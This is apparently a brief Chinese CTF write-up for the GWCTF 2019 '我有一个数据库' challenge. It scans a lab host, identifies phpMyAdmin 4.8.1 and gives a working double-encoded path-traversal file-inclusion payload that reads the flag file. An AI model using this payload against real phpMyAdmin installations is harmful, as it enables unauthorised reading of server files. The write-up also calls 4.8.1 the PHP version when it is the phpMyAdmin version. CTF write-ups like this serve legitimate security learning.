[GWCTF 2019]我有一个数据库 WP
这道题主要考察的是一个对phpmyadmin 4.8.2& 4.8.1 版本的特有漏洞的了解。
先看题
进去以后是一堆乱码,用御剑去扫一波
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txt
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.php
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/config.inc.php
扫出来这么几个文件
访问phpmyadmin看一眼
php的版本是4.8.1,4.8.2和4.8.1的php版本都有一个漏洞,都存在着远程文件读取漏洞
直接上payload去访问就行
index.php?target=db_sql.php%253f/../../../../../../../../flag
关于phpmyadmin的漏洞的相关知识点在这里
文件包含漏洞